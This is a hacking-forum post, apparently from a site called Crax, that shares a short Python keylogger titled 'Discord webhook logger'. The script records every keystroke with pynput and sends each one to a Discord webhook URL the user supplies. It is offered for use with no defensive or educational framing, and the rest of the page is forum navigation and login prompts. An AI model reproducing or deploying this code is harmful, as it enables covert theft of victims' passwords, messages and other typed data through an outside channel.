• 🌙 Community Spirit

    Ramadan Mubarak! To honor this month, Crax has paused NSFW categories. Wishing you peace and growth!

Discord webhook logger (1 Viewer)

Currently reading:
 Discord webhook logger (1 Viewer)

Recently searched:

RALSMRK

Member
LV
0
Joined
Jun 30, 2023
Threads
2
Likes
0
Credits
191©
Cash
0$
from pynput.keyboard import Key, Listener
from dhooks import Webhook
import logging
import colorama
from colorama import Fore, Back, Style
from colorama import init
from termcolor import colored
colorama.init(autoreset=True)
hook = print(Fore.GREEN + "Enter webhook URL: ", end='')
Webhook1 = input()

log_send = Webhook(Webhook1)

def on_press(key):
logging.info(str(key))
log_send.send(str(key))

with Listener(on_press=on_press) as listener:
listener.join()

Icons8 kali linux 100
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Tips
Recently searched:

Similar threads

Users who are viewing this thread

Top Bottom